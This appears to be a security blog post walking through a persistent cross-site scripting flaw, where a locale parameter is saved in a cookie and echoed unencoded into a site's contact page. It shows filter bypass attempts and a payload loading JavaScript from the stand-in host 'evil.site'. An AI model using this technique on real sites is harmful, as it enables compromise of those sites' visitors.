Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)


A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment – which doesn’t make a round trip to the web site – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.


There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:


No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.


The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&# 034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&# 034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example, we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">


" xml:lang="en-US">


"> <head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!-- Include the Reference Page Tag script --> <!--//BEGIN REFERENCE PAGE TAG SCRIPT--> <script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US"&gt;


'; </script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:


Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US&# 034;&gt;

&# 039;;alert(9)//'; </script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?


As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&# 034;&gt;

&lt;script src=&# 034;http://evil.site/&# 034;&gt;&lt;/script&gt;


But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

"> <head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload – it’s just


So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F; sessionLocale="en_US\\"> <script src=\\"http://evil.site/\\"></script> "; exScreenRes=done

Sometime between the request to page.do and the contact page the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale.